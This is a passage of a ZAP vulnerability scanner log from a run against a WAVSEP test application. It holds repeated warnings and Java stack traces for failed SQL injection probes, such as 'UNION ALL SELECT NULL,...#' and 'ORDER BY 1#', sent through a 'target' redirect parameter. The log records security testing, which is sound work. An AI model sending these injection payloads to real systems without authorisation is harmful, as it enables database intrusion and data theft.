org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679489 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679489 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679490 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679490 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679491 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679492 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679493 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679493 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679494 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679495 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679495 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679497 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679497 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 